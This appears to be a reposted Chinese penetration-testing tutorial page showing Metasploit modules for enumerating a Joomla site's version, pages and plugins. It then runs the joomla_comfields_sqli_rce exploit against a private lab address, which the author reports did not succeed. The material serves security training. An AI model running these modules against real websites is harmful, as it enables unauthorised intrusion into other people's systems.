Skip to main content
 Web开发网 » 站长学院 » 浏览器插件

Metasploit6.0系列教程 -- 渗透Joomla网站

2021年11月02日6990百度已收录

一、使用Metasploit对Joomal进行侦察

1、探测版本信息

选择joomla_version辅助模块,设置端口号及IP地址,run运行

use auxiliary/scanner/Metasploit6.0系列教程 -- 渗透Joomla网站 Joomla 第1张

2、页面枚举

选择Joomla_pages辅助模块,设置端口号及IP地址,run运行

use auxiliary/scanner/Metasploit6.0系列教程 -- 渗透Joomla网站 Joomla 第2张

3、插件枚举

选择Joomla_plugins辅助模块,设置端口号及IP地址,run运行

use auxiliary/scanner/Metasploit6.0系列教程 -- 渗透Joomla网站 Joomla 第3张

二、使用Metasploit对Joomla进行漏洞利用

1、use unix/webapp/joomla_comfields_sqli_rce2、set rhosts 192.168.1.1113、set rport 80804、runMetasploit6.0系列教程 -- 渗透Joomla网站 Joomla 第4张

5、因为利用模块会报错,所以需要修改一下,但是最后还是没有利用成功,获取cookie的时候可能出问题了,大家有兴趣的可以继续修改一下。

Metasploit6.0系列教程 -- 渗透Joomla网站 Joomla 第5张

该系列教程内容参考自华章IT出版的

《Web渗透测试实战:基于Metasploit 5.0》

禁止非法,后果自负

欢迎关注公众号:web安全工具库

欢迎关注视频号:之乎者也吧

Metasploit6.0系列教程 -- 渗透Joomla网站 Joomla 第6张

Metasploit6.0系列教程 -- 渗透Joomla网站 Joomla 第7张

Metasploit6.0系列教程 -- 渗透Joomla网站 Joomla 第8张

上一篇: 有哪些好的免费自助建站?

下一篇: 「开源资讯」免费建站系统,Joomla 3.9.22 发布

  文章来源:
  https://www.kaifa5.com/9417.html
阅读延展

有哪些好的免费自助建站?

人到中年一事无成,难道要打工到老吗?

「开源资讯」免费建站系统,Joomla 3.9.22 发布

国外开源CMS,joomla怎么学习?

评论列表暂无评论
发表评论
验证码
微信